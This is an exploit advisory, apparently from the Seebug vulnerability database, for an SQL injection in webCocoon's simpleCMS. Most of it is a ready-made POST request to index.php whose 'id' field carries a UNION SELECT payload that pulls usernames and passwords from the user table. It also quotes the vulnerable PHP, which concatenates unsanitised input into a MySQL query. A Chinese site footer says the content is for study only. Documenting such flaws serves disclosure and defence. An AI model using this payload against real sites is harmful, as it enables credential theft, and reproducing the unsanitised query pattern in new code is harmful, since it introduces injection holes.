############################################################# # webCocoon's simpleCMS Vulnerability # Plugin Home: http://webcocoon.wordpress.com # Author:_ÝNFAZCI_ # Site: www.1923turk.biz ############################################################## # Exploit: Vuln file: /content/post/show.php Exploit: POST http://[host]/[path]/index.php HTTP/1.0 Content-type: application/x-www-form-urlencoded id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null from user -- &mode=post&gfile=show //Show post $get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'"); $post_result = mysql_num_rows($get_post); $post = mysql_fetch_array($get_post);
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论